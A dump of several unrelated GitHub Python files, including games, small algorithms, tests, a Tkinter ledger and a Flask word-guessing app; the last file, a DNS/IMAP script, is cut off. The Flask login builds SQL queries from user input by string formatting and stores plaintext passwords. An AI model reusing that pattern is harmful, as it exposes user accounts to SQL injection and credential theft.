pass","repo_name":"ziv17/SRT-tools","sub_path":"srtFix/src/srtFix/getArgs.py","file_name":"getArgs.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70691285286","text":"from src.model.components.ocr import OCR\nimport json\nimport os\nfrom tqdm import tqdm\n\n# with open('./data/dev_data_ocr.json', 'r', encoding= 'utf8') as f:\n# data = json.load(f)\n# keys = list(data['annotations'].keys())\n# print(len(keys))\n# entry = data['annotations'][keys[50]]\n# print(entry)\n# image_path = data['images'][str(entry['image_id'])]\n# print(image_path)\n\nocr = OCR()\n# with open(os.path.join('./data', 'vlsp2023_dev_data.json'), 'r', encoding= 'utf8') as f:\n# data = json.load(f)\n# keys = list(data['annotations'].keys())\n# entry = data['annotations'][keys[136]]\n# print(ocr(os.path.join('./data/', 'dev-images', data['images'][str(entry['image_id'])])))\n\ndef get_tokens(path, map_file, data_dir, predictor, new_file):\n with open(os.path.join(path, map_file), 'r', encoding= 'utf8') as f:\n data = json.load(f)\n keys = list(data['annotations'].keys())\n for i in tqdm(range(len(keys)), desc= f'Reading {map_file}'):\n entry = data['annotations'][keys[i]]\n image_path = data['images'][str(entry['image_id'])]\n tokens = predictor(os.path.join(path, data_dir, image_path))\n tokens = ' '.join(tokens) if len(tokens) > 0 else ''\n entry['ocr'] = tokens\n with open(os.path.join(path, new_file), 'w', encoding= 'utf8') as f:\n json.dump(data, f, indent= 4)\n\nget_tokens('./data', 'vlsp2023_dev_data.json', 'dev-images', ocr, 'dev_data_ocr.json')\nget_tokens('./data', 'vlsp2023_test_data.json', 'test-images', ocr, 'test_data_ocr.json')\nget_tokens('./data', 'vlsp2023_train_data.json', 'training-images', ocr, 'train_data_ocr.json')\n ","repo_name":"suracI-invert/vlsp-vqa","sub_path":"ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41298024535","text":"# Snake game using the PyGame library for python\n#\n# By Ryan C. McDermott\n\nimport pygame\nimport time\nfrom random import randrange\npygame.init()\nfrom spritesheet import SpriteSheet\n\nSNAKE_WIDTH = 24\nSNAKE_HEIGHT = 24\nW_MULT = 32\nH_MULT = 24\nHEIGHT_BORDER = H_MULT*SNAKE_HEIGHT\nWIDTH, HEIGHT = W_MULT*SNAKE_WIDTH, HEIGHT_BORDER + (4 * SNAKE_HEIGHT)\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Snake v1.0\")\nBACKGROUND = (50, 50, 50)\nSNAKE_COLOUR = (0, 255, 0)\nFRUIT_COLOUR = (255, 0, 0)\nBORDER_COLOUR = (0, 0, 255)\nGAME_FONT = pygame.font.SysFont('Times New Roman', 30)\nFPS = 15\n\nsprite_sheet = pygame.image.load(\"assets/Textures.png\").convert_alpha()\nLOSE_SCREEN = pygame.image.load(\"assets/LoseScreen.png\").convert_alpha()\nLOSE_SCREEN = pygame.transform.scale(LOSE_SCREEN, (WIDTH, HEIGHT))\n\nborder_line = pygame.Rect(0, HEIGHT_BORDER, WIDTH, SNAKE_HEIGHT // 2)\n\nsnake = pygame.Rect((WIDTH // 2) - SNAKE_WIDTH,\n (HEIGHT_BORDER // 2),\n SNAKE_WIDTH,\n SNAKE_HEIGHT)\nsnake_change_x = 0\nsnake_change_y = 0\n\nfruit_x = randrange(1, W_MULT) * SNAKE_WIDTH\nfruit_y = randrange(1, H_MULT) * SNAKE_HEIGHT\nfruit = pygame.Rect(fruit_x, fruit_y, SNAKE_WIDTH, SNAKE_HEIGHT)\n\ndef draw_game(snake, fruit, snake_body, score):\n WIN.fill(BACKGROUND)\n pygame.draw.rect(WIN, BORDER_COLOUR, (border_line.x, border_line.y, WIDTH, SNAKE_HEIGHT // 2))\n snake_head = SpriteSheet(sprite_sheet, 384, 384, 2, 0).get_image(8)\n\n text_surface = GAME_FONT.render(f\"Score: {score}\", True, BORDER_COLOUR)\n WIN.blit(text_surface, (40, HEIGHT_BORDER + 40))\n\n if len(snake_body) == 1:\n pygame.draw.rect(WIN, SNAKE_COLOUR, (snake.x, snake.y, SNAKE_WIDTH, SNAKE_HEIGHT))\n else:\n for i in range(len(snake_body)):\n pygame.draw.rect(WIN, SNAKE_COLOUR, (snake_body[i][0], snake_body[i][1], SNAKE_WIDTH, SNAKE_HEIGHT))\n\n pygame.draw.rect(WIN, FRUIT_COLOUR, (fruit.x, fruit.y, SNAKE_WIDTH, SNAKE_HEIGHT))\n # WIN.blit(snake_head, (snake.x, snake.y))\n pygame.display.update()\n\ndef snake_move(snake, key, snake_body):\n global snake_change_x\n global snake_change_y\n if (key[pygame.K_LEFT] and snake.x > 0 and\n (snake.x - SNAKE_WIDTH) not in [snake_list[0] for snake_list in snake_body]):\n snake_change_x = - SNAKE_WIDTH\n snake_change_y = 0\n if (key[pygame.K_RIGHT] and snake.x < WIDTH - SNAKE_WIDTH and\n (snake.x + SNAKE_WIDTH) not in [snake_list[0] for snake_list in snake_body]):\n snake_change_x = SNAKE_WIDTH\n snake_change_y = 0\n if (key[pygame.K_UP] and snake.y > 0 and\n (snake.y - SNAKE_WIDTH) not in [snake_list[1] for snake_list in snake_body]):\n snake_change_y = - SNAKE_HEIGHT\n snake_change_x = 0\n if (key[pygame.K_DOWN] and snake.y < HEIGHT_BORDER - SNAKE_HEIGHT and\n (snake.y + SNAKE_WIDTH) not in [snake_list[1] for snake_list in snake_body]):\n snake_change_y = SNAKE_HEIGHT\n snake_change_x = 0\n\n\ndef main():\n score = 0\n snake_length = 1\n snake_body = []\n clock = pygame.time.Clock()\n run = True\n while run:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n key = pygame.key.get_pressed()\n snake_move(snake, key, snake_body)\n snake.x += snake_change_x\n snake.y += snake_change_y\n snake_body.append([snake.x, snake.y])\n if len(snake_body) > snake_length:\n del snake_body[0]\n\n if (fruit.x, fruit.y) == (snake.x, snake.y):\n fruit.x = randrange(1, W_MULT) * SNAKE_WIDTH\n fruit.y = randrange(1, H_MULT) * SNAKE_HEIGHT\n snake_length += 1\n score += 1\n\n draw_game(snake, fruit, snake_body, score)\n\n\n if snake.x < 0 or snake.x > (WIDTH - SNAKE_WIDTH):\n run = False\n WIN.blit(LOSE_SCREEN, (0, 0))\n pygame.display.update()\n time.sleep(3)\n\n\n if snake.y < 0 or snake.y > (HEIGHT_BORDER - SNAKE_HEIGHT):\n run = False\n WIN.blit(LOSE_SCREEN, (0, 0))\n pygame.display.update()\n time.sleep(3)\n\n\n pygame.quit()\n\nif __name__ == '__main__':\n main()","repo_name":"R-C-McDermott/PyGame-Snake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18538034155","text":"# 파일 합치기 3 G4\n# 1. 파일들 중에서 제일 작은 두개를 뽑는다.\n# 2. 합친다\n# 3. 합친걸 다시 파일들에 둔다.\n# 우선순위큐를 이용해서 항상 작은 값들이 앞으로 가게 함\nimport heapq\nimport sys\n\ninput = sys.stdin.readline\nt = int(input())\nfor _ in range(t):\n n = int(input())\n arr = list(map(int, input().split()))\n file = []\n for i in arr:\n heapq.heappush(file, i)\n result = 0\n while len(file) > 1:\n a = heapq.heappop(file)\n b = heapq.heappop(file)\n result += a + b\n heapq.heappush(file, a + b)\n\n print(result)\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"그리디/13975.py","file_name":"13975.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26351548041","text":"##Status: Solved\n##Problem: If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n##\n##If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, how many letters would be used?\n##\n##\n##NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-two) contains 23 letters and 115 (one hundred and fifteen) contains 20 letters. The use of \"and\" when writing out numbers is in compliance with British usage.\n\nnumbermap = [0,3,3,5,4,4,3,5,5,4] #This is a map from our base numbers to the ammount of letters used\nhundred = 7\nthousand = 8\nund = 3\nteens = [3,3,3,3,4,3,4,4,3,4] #additional letters relative to its single digit place\ntens = [0,\"blank\",6,6,5,5,5,7,6,6] #tens 20, 30,....\n\ncount = 0\n\nfor i in range(1,1001): #This for loop will go thorugh each number\n strnum = str(i)\n count+=numbermap[int(strnum[len(strnum)-1])] #for said number, it'll count the letters used for the singles digit place\n if i >9: #for any number beyond 9, it'll take into conideration the tens digit place using the teens as a special case ruling relative to the others\n if int(strnum[len(strnum)-2]) == 1:\n count+=teens[int(strnum[len(strnum)-1])]\n else:\n count+=tens[int(strnum[len(strnum)-2])]\n if i > 99: #this will consider the hundreds digit place making rules about when to add hundred and and\n count+=numbermap[int(strnum[len(strnum)-3])]\n if i%1000 !=0:\n count+= hundred\n if i%100 != 0:\n count+=und\n if i > 999:\n count+=numbermap[int(strnum[len(strnum)-4])]\n count+= thousand\nprint(count)\n","repo_name":"himynameisfil-website-challenges/Project-Euler-dot-com","sub_path":"problem017.py","file_name":"problem017.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21211092359","text":"'''\nRequired Tests:\n- [x] “Happy Path” - Expected outcome\n- [x] Expected failure\n- [x] Edge Case (if applicable/obvious)\n'''\n\nimport pytest\n\nfrom code_challenges.fifo_animal_shelter.fifo_animal_shelter import Cat, Dog, Animal, AnimalShelter\nfrom stacks_and_queues.stacks_and_queues import Queue, InvalidOperationError\n\n# py project .toml lives... that is the route directory....\n\ndef test_connection():\n return AnimalShelter()\n\ndef test_animal_is_cute():\n animal = Animal()\n actual = animal.trait\n expected = \"cute\"\n assert actual == expected\n\ndef test_make_a_cat():\n cat = Cat()\n actual = type(cat)\n expected = Cat\n assert actual == expected\n\ndef test_dog_is_cute():\n dog = Dog()\n actual = dog.trait\n expected = \"cute\"\n assert actual == expected\n\ndef test_name():\n dog = Dog(\"Fido\")\n actual = dog.name\n expected = \"Fido\"\n assert actual == expected\n\ndef test_enqueue_cat():\n cat = Cat(\"Felix\")\n shelter = AnimalShelter()\n shelter.enqueue(cat)\n actual = shelter.cat_queue.peek().name\n expected = \"Felix\"\n assert actual == expected\n\ndef test_enqueue_dog():\n dog = Dog(\"Spot\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n actual = shelter.dog_queue.peek().name\n expected = \"Spot\"\n assert actual == expected\n\ndef test_request_cat():\n cat = Cat(\"Felix\")\n shelter = AnimalShelter()\n shelter.enqueue(cat)\n actual = shelter.dequeue(\"cat\").name\n expected = \"Felix\"\n assert actual == expected\n\ndef test_request_cat_line_of_two():\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n actual = shelter.dequeue(\"cat\").name\n expected = \"Felix\"\n assert actual == expected\n\ndef test_request_cat_line_of_two_second():\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n shelter.dequeue(\"cat\")\n actual = shelter.dequeue(\"cat\").name\n expected = \"Garfield\"\n assert actual == expected\n\ndef test_request_dog_line_of_two():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n actual = shelter.dequeue(\"dog\").name\n expected = \"Spot\"\n assert actual == expected\n\ndef test_request_snake():\n cat = Cat(\"Felix\")\n shelter = AnimalShelter()\n shelter.enqueue(cat)\n actual = shelter.dequeue(\"snake\")\n expected = None\n assert actual == expected\n\ndef test_request_dog_empty():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n shelter.dequeue(\"dog\")\n shelter.dequeue(\"dog\")\n #context manager (aka bubble) to raise errors in to test them; otherwise seen as legit error. Thanks Skyler!\n with pytest.raises(InvalidOperationError):\n shelter.dequeue(\"dog\")\n\ndef test_animal_id_counter_cat():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n actual = shelter.cat_queue.peek().animal_id\n expected = 3\n assert actual == expected\n\ndef test_animal_id_counter_dog():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n actual = shelter.dog_queue.peek().animal_id\n expected = 1\n assert actual == expected\n\ndef test_waiting_longer_animal():\n dog = Dog(\"Spot\")\n dog2 = Dog(\"Clifford\")\n cat = Cat(\"Felix\")\n cat2 = Cat(\"Garfield\")\n shelter = AnimalShelter()\n shelter.enqueue(dog)\n shelter.enqueue(dog2)\n shelter.enqueue(cat)\n shelter.enqueue(cat2)\n new_pet = shelter.dequeue()\n actual = type(new_pet)\n expected = Dog\n assert actual == expected\n","repo_name":"paul-leonard/data-structures-and-algorithms","sub_path":"python/tests/test_fifo_animal_shelter.py","file_name":"test_fifo_animal_shelter.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"47808491658","text":"from tkinter import *\n\ncurrent_state = [{'name': \"Ivanov\", 'account': 70155120}]\n\nwidth_val = 640\nheight_val = 480\n\nGUI = Tk()\nGUI.geometry(\"{0}x{1}\".format(width_val, height_val))\nGUI.title(\"Задание 2\")\n\ncommand_line = StringVar()\n\nmain_frame = Frame()\nmain_frame.pack()\n\nfirst_frame = Frame(main_frame)\nfirst_frame.pack(side=LEFT)\n\nsecond_frame = Frame(main_frame)\nsecond_frame.pack()\n\n\ndef key(event):\n print(\"pressed\", repr(event.char))\n s = command_console.get(1.0, END)\n startCommand(s)\n\n\ndef deposit(name, value):\n client = False\n this_string = \"\"\n for i in range(len(current_state)):\n if current_state[i]['name'] == name:\n current_account = int(current_state[i]['account'])\n current_account += int(value)\n current_state[i]['account'] = str(current_account)\n this_string += \"DEPOSIT: {1} to {0}\".format(name, value)\n print(\"DEPOSIT: {1} to {0}\".format(name, value))\n client = True\n if not client:\n current_state.append({'name': name, 'account': value})\n this_string += \"CREATE: {0} \\n DEPOSIT: {1} to {0}\".format(name, value)\n print(\"CREATE: {0} \\n DEPOSIT: {1} to {0}\".format(name, value))\n\n this_string += \"\\n\"\n return this_string\n\n\ndef withdraw(name, value):\n this_string = \"\"\n client = False\n for i in range(len(current_state)):\n if current_state[i]['name'] == name:\n current_account = int(current_state[i]['account'])\n current_account -= int(value)\n current_state[i]['account'] = str(current_account)\n this_string += \"WITHDRAW: {1} from {0}\".format(name, value)\n print(\"WITHDRAW: {1} from {0}\".format(name, value))\n client = True\n if not client:\n current_state.append({'name': name, 'account': (int(value) * (-1))})\n this_string += \"CREATE: {0} \\n WITHDRAW: {1} to {0}\".format(name, value)\n print(\"CREATE: {0} \\n WITHDRAW: {1} from {0}\".format(name, value))\n\n this_string += \"\\n\"\n return this_string\n\n\ndef balance(name):\n this_string = \"\"\n client = False\n for i in range(len(current_state)):\n if current_state[i]['name'] == name:\n this_string += \"BALANCE: {0} is {1}\".format(name, current_state[i]['account'])\n print(\"BALANCE: {0} is {1}\".format(name, current_state[i]['account']))\n client = True\n if not client:\n this_string += \"BALANCE: NO CLIENT\"\n print(\"BALANCE: NO CLIENT\")\n\n this_string += \"\\n\"\n return this_string\n\n\ndef transfer(name_from, name_to, value):\n this_string = \"\"\n\n deposit(name_to, value)\n withdraw(name_from, value)\n this_string += \"TRANSFER: From {0} to {1} {2}\".format(name_from, name_to, value)\n print(\"TRANSFER: From {0} to {1} {2}\".format(name_from, name_to, value))\n\n this_string += \"\\n\"\n return this_string\n\n\ndef income(percent):\n this_string = \"\"\n\n for i in range(len(current_state)):\n if int(current_state[i]['account']) > 0:\n current_account = int(current_state[i]['account'])\n current_account += int(current_account * (int(percent) / 100))\n current_state[i]['account'] = str(current_account)\n this_string += \"INCOME: All users get {0}%\".format(percent)\n print(\"INCOME: All users get {0}%\".format(percent))\n\n this_string += \"\\n\"\n return this_string\n\n\ndef startCommand(command_string):\n command_console.delete(1.0, END)\n transaction_history = \"\"\n commands = command_string.split(\"\\n\")\n\n for i in range(len(commands)):\n command = commands[i].split(\" \")\n if command[0] == \"DEPOSIT\":\n if len(command) == 3:\n transaction_history += deposit(command[1], command[2])\n if command[0] == \"WITHDRAW\":\n if len(command) == 3:\n transaction_history += withdraw(command[1], command[2])\n if command[0] == \"BALANCE\":\n if len(command) == 2:\n transaction_history += balance(command[1])\n if command[0] == \"TRANSFER\":\n if len(command) == 4:\n transaction_history += transfer(command[1], command[2], command[3])\n if command[0] == \"INCOME\":\n if len(command) == 2:\n transaction_history += income(command[1])\n\n command_output['text'] = transaction_history\n\n\ncommand_button = Button(first_frame, text=\"Calculate\")\ncommand_button.pack(side=LEFT, padx=5)\ncommand_button.bind('', key)\n\n# command_console = Text(main_frame, textvariable=command_line)\ncommand_console = Text(first_frame, width=35)\ncommand_console.pack(side=LEFT, padx=5)\n\nscroll = Scrollbar(first_frame, command=command_console.yview)\nscroll.pack(side=LEFT, fill=Y)\n\ncommand_console.config(yscrollcommand=scroll.set)\n\ncommand_output = Label(first_frame, text=\"Текст\")\ncommand_output.pack(side=LEFT, padx=5)\n\nGUI.mainloop()\n","repo_name":"Lavreek/Python-Test-excercises","sub_path":"exercise_2/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":4891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21878486745","text":"import re\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import request\nimport random\nfrom sutom import *\nimport sqlite3\n\n\napp=Flask(__name__)\n\nglobal ini #initialisation d'une variable ini qui va permettre de savoir si on est au début d'un jeu ou non\nglobal longueur #longueur du mot\nglobal essais \nglobal nb_essais #nb d'essais sur la partie en cours\nglobal verifreload # regarde si l'utilisateur a reload apres avoir gagné\nglobal login\n\nlogin=0\nessais=6\nlongueur=5\nini =0\nverifreload=0\n\ndef testconnect():\n global login\n if login!=0:\n print(login)\n return True\n else:\n return False\n\n@app.route('/')\ndef initial():\n global login\n login=0\n global ini\n ini=0\n return redirect(\"/jeusanslogin\")\n\n\n@app.route('/inscription')\ndef inscription():\n global login\n login=0\n return render_template('inscription.html')\n\n@app.route('/register',methods=[\"POST\"])\ndef register():\n global ini\n ini=0\n db=sqlite3.connect('projet.db')\n cur=db.cursor()\n cur.execute(\"SELECT pseudo FROM user\")\n users=cur.fetchall()\n login=request.form.get(\"login\")\n mdp=request.form.get(\"mdp\")\n if not login:\n return render_template('erreur.hmtl',message=\"Login non renseigné\")\n if not mdp:\n return render_template('erreur.hmtl',message=\"Mot de passe non renseigné\")\n if login in users:\n return render_template('erreur.html',message=\"Login déjà utilisé, veuillez en choisir un autre.\")\n cur.execute(\"INSERT INTO user (pseudo,mdp,parties_jouees,parties_gagnees) VALUES (?,?,0,0)\",(login,mdp))\n db.commit()\n db.close()\n return render_template('inscription_reussie.html')\n\n@app.route('/login')\ndef connexion():\n global ini,login\n ini=0\n login=0\n return render_template('login.html')\n\n@app.route('/loginbis',methods=['POST'])\ndef loginbis():\n db=sqlite3.connect('projet.db')\n cur=db.cursor()\n pseudo=request.form.get(\"login\")\n mdp=request.form.get(\"mdp\")\n cur.execute(\"SELECT pseudo FROM user where pseudo='{}'\".format(pseudo))\n users=cur.fetchone()\n print(users)\n \n if not users:\n return render_template('erreur.html',message=\"Login inconnu. Veuillez vous inscrire.\")\n cur.execute(\"SELECT mdp FROM user WHERE pseudo='{}'\".format(pseudo))\n bonmdp=cur.fetchone()[0]\n if mdp!=bonmdp:\n return render_template('erreur.html',message=\"Mot de passe incorrect\")\n global login\n login=pseudo\n return redirect('/jeulogin')\n\n@app.route('/deconnexion')\ndef deconnexion():\n global login \n login=0\n return redirect('/jeusanslogin')\n\nglobal mot\nmot=0\n\n@app.route('/jeusanslogin',methods=[\"POST\",\"GET\"])\ndef jeusanslogin():\n if testconnect():\n return redirect(\"/deco\")\n global ini,L,T,bonnes,longueur,essais,nb_essais,verifreload,motatrouve,mot,rej #j'ai rajouté mot pour pas rajouter un essai quand on refresh\n print(\"ini\",ini)\n \n if verifreload!=0:\n ini=0\n verifreload=0\n if ini==0:\n rej=\"Proposer\"\n ini+=1\n nb_essais=0\n L=[]\n T=[]\n L.append(\"Longueur du mot à trouver : {}\".format(longueur))\n db=sqlite3.connect('projet.db')\n cur=db.cursor()\n cur.execute(\"SELECT mot FROM dico WHERE longueur={}\".format(longueur))\n mots=cur.fetchall()\n n=random.randint(0,len(mots))\n motatrouve=mots[n][0]\n print(\"motatrouve\",motatrouve)\n db.close()\n g=\"Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n bonnes = ['-' for i in range(longueur)] \n return render_template('jeusanslogin.html',liste=L,test=T,gagne=g,long=longueur,essai=essais,boutonrejouer=rej)\n else:\n y=0 #pour vérifier la bonne longueur\n g=\"Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n motp=request.form.get(\"motprop\")\n if motp==mot: #evite les problème de refresh\n pass\n else:\n mot=motp\n print(\"mot\",mot)\n if mot == \"\" or len(mot)!=longueur:\n g=\"Mauvaise longueur. Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n # L.pop()\n # L.append(\"Mauvaise longueur de mot, réessaye mongolo\",) # empecher de faire des mots nuls ou meme de mauvaises longueurs\n else:\n bonnes,bonnesponctuel,malponctuel,faussesponctuel=prop(mot,motatrouve,longueur,bonnes)\n #print(bonnes)\n nb_essais+=1\n g=\"Longueur du mot : {}, Essais : {}/{}\".format(longueur,nb_essais,essais)\n #L.pop()\n if bonnes==0:\n g=\"Vous avez gagné ! \"\n verifreload=1\n rej=\"Recommencer\"\n bonneliste=[]\n for lettre in motatrouve:\n bonneliste.append((lettre,\"carrevert\"))\n T.append(bonneliste)\n #L.append(\"{}\".format(mot))\n elif nb_essais==essais:\n bonneliste=[]\n #print(bonnesponctuel,malponctuel,faussesponctuel)\n for i in range(longueur):\n #rint(bonnesponctuel[i],malponctuel[i],faussesponctuel[i])\n if bonnesponctuel[i]!='-':\n #print(\"oui\",bonnesponctuel[i])\n bonneliste.append((bonnesponctuel[i],\"carrevert\"))\n elif malponctuel[i]!='-':\n #print(\"oui\",bonnesponctuel[i])\n bonneliste.append((malponctuel[i],\"carreorange\"))\n else:\n #print(\"oui\",bonnesponctuel[i])\n bonneliste.append((faussesponctuel[i],\"carregris\"))\n T.append(bonneliste)\n g=\"Vous avez perdu ! Le mot était {}\".format(motatrouve)\n verifreload=1\n\n #L.append(\"{}, {}, {}, {}, {}\".format(mot,bonnes,bonnesponctuel,malponctuel,faussesponctuel))\n else:\n #L.append(\"{}, {}, {}, {}, {}\".format(mot,bonnes,bonnesponctuel,malponctuel,faussesponctuel))\n \n bonneliste=[]\n #print(bonnesponctuel,malponctuel,faussesponctuel)\n for i in range(longueur):\n #rint(bonnesponctuel[i],malponctuel[i],faussesponctuel[i])\n if bonnesponctuel[i]!='-':\n #print(\"oui\",bonnesponctuel[i])\n bonneliste.append((bonnesponctuel[i],\"carrevert\"))\n elif malponctuel[i]!='-':\n #print(\"oui\",bonnesponctuel[i])\n bonneliste.append((malponctuel[i],\"carreorange\"))\n else:\n #print(\"oui\",bonnesponctuel[i])\n bonneliste.append((faussesponctuel[i],\"carregris\"))\n T.append(bonneliste)\n #print(T)\n return render_template('jeusanslogin.html',liste=L,test=T,gagne=g,long=longueur,essai=essais,boutonrejouer=rej)\n\n \n\n@app.route('/jeulogin',methods=[\"GET\",\"POST\"])\ndef jeulogin():\n if not testconnect():\n return redirect('/login')\n global ini,L,bonnes,longueur,essais,nb_essais,verifreload,motatrouve,login\n print(\"ini\",ini)\n \n if verifreload!=0:\n ini=0\n verifreload=0\n if ini==0:\n ini+=1\n nb_essais=0\n L=[]\n L.append(\"Longueur du mot à trouver : {}\".format(longueur))\n db=sqlite3.connect('projet.db')\n cur=db.cursor()\n cur.execute(\"SELECT mot FROM dico WHERE longueur={}\".format(longueur))\n mots=cur.fetchall()\n n=random.randint(0,len(mots))\n motatrouve=mots[n][0]\n print(\"motatrouve\",motatrouve)\n db.close()\n g=\"\"\n \n bonnes = ['-' for i in range(longueur)] \n return render_template('jeulogin.html',liste=L,login=login)\n else:\n g=\"\"\n print(\"motprop\",request.form.get(\"motprop\"))\n motp=request.form.get(\"motprop\")\n if motp==mot:\n pass\n else:\n if mot == \"\" or len(mot)!=longueur:\n L.pop()\n L.append(\"Mauvaise longueur de mot, réessaye mongolo\") # empecher de faire des mots nuls ou meme de mauvaises longueurs\n else:\n bonnes,bonnesponctuel,malponctuel,faussesponctuel=prop(mot,motatrouve,longueur,bonnes)\n #print(bonnes)\n nb_essais+=1\n L.pop()\n if bonnes==0:\n g=\"Vous avez gagné ! \"\n verifreload=1\n L.append(\"{}\".format(mot))\n db=sqlite3.connect(\"projet.db\")\n cur=db.cursor()\n cur.execute(\"SELECT parties_jouees,parties_gagnees FROM user WHERE pseudo='{}'\".format(login))\n parties=cur.fetchone()\n part_j,part_g=parties[0]+1,parties[1]+1\n cur.execute(\"UPDATE user SET parties_jouees = {} WHERE pseudo = '{}'\".format(part_j,login))\n cur.execute(\"UPDATE user SET parties_gagnees = {} WHERE pseudo = '{}'\".format(part_g,login))\n\n db.commit()\n db.close()\n elif nb_essais==essais:\n g=\"Vous avez perdu ! Le mot était {}\".format(motatrouve)\n verifreload=1\n L.append(\"{}, {}, {}, {}, {}\".format(mot,bonnes,bonnesponctuel,malponctuel,faussesponctuel))\n db=sqlite3.connect(\"projet.db\")\n cur=db.cursor()\n cur.execute(\"SELECT parties_jouees,parties_gagnees FROM user WHERE pseudo='{}'\".format(login))\n parties=cur.fetchone()\n part_j,part_g=parties[0]+1,parties[1]\n cur.execute(\"UPDATE user SET parties_jouees = {} WHERE pseudo = '{}'\".format(part_j,login))\n\n db.commit()\n db.close()\n else:\n L.append(\"{}, {}, {}, {}, {}\".format(mot,bonnes,bonnesponctuel,malponctuel,faussesponctuel))\n L.append(\"Nombre d'essais : {} / {}\".format(nb_essais,essais))\n return render_template('jeulogin.html',liste=L,gagne=g,login=login)\n\n@app.route('/historique_score')\ndef historique_score():\n if not testconnect():\n return redirect('/login')\n db=sqlite3.connect(\"projet.db\")\n cur=db.cursor()\n cur.execute(\"SELECT parties_jouees,parties_gagnees FROM user WHERE pseudo={}\".format(login))\n parties=cur.fetchall()\n nb_jouees=parties[0]\n nb_gagnees=parties[1]\n return render_template('historique_score.html',login=login,nb_jouees=nb_jouees,nb_gagnees=nb_gagnees)\n\n@app.route(\"/filtrelettres\",methods=[\"POST\",\"GET\"])\ndef filtrelettres():\n global longueur,ini\n ini=0 #reset le jeu\n longueur=int(request.form.get(\"nbdelettres\"))\n if testconnect():\n return redirect(\"jeulogin\")\n else:\n return redirect(\"/jeusanslogin\")\n\n@app.route(\"/filtrechances\",methods=[\"POST\",\"GET\"])\ndef filtrechances():\n global essais,ini\n ini=0\n essais=int(request.form.get(\"nbdechances\"))\n if testconnect():\n return redirect(\"jeulogin\")\n else:\n return redirect(\"/jeusanslogin\")\n\n@app.route(\"/deco\")\ndef deco():\n global login\n login = 0\n return redirect(\"/jeusanslogin\")","repo_name":"eddd33/JeuSolveurWordle","sub_path":"sitesafe/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11593,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74477412965","text":"import socket, struct, imaplib, sys\n\ndef getMsgsFromGmail():\n m = imaplib.IMAP4_SSL('imap.gmail.com', 993)\n m.login(sys.argv[1], sys.argv[2])\n m.select('INBOX', readonly=True)\n msgs = m.search(None, 'UNSEEN')[1][0].split()\n count = len(msgs)\n if msgs:\n fetchs = m.fetch(','.join(msgs), '(BODY.PEEK[HEADER.FIELDS (SUBJECT)])')[1]\n raw_fetch_entries = [ item for fetch in fetchs for item in fetch ]\n subjects = [ entry.strip() for entry in raw_fetch_entries if entry[:7] == 'Subject']\n subjects_str = \". \".join(subjects)\n else:\n subjects_str = \"\"\n\n return (count, subjects_str)\n\n\nclass Query(object):\n\n class Header(object):\n def __init__(self, data):\n (self.ID, self.FLAGS, self.NQUERIES, self.NREPLIES, self.NNS, self.NADDRES) = \\\n struct.unpack('!6H', data)\n\n self.FLAGS = self._parseFlags(self.FLAGS)\n\n def _parseFlags(self, flags):\n d = dict()\n d['RCODE'] = flags & 0xf; flags >>= 4\n d['Z'] = flags & 0x7; flags >>= 3\n d['RA'] = flags & 0x1; flags >>= 1\n d['RD'] = flags & 0x1; flags >>= 1\n d['TC'] = flags & 0x1; flags >>= 1\n d['AA'] = flags & 0x1; flags >>= 1\n d['OPCODE'] = flags & 0xf; flags >>= 4\n d['QR'] = flags & 0x1; flags >>= 1\n\n assert(flags == 0)\n\n return 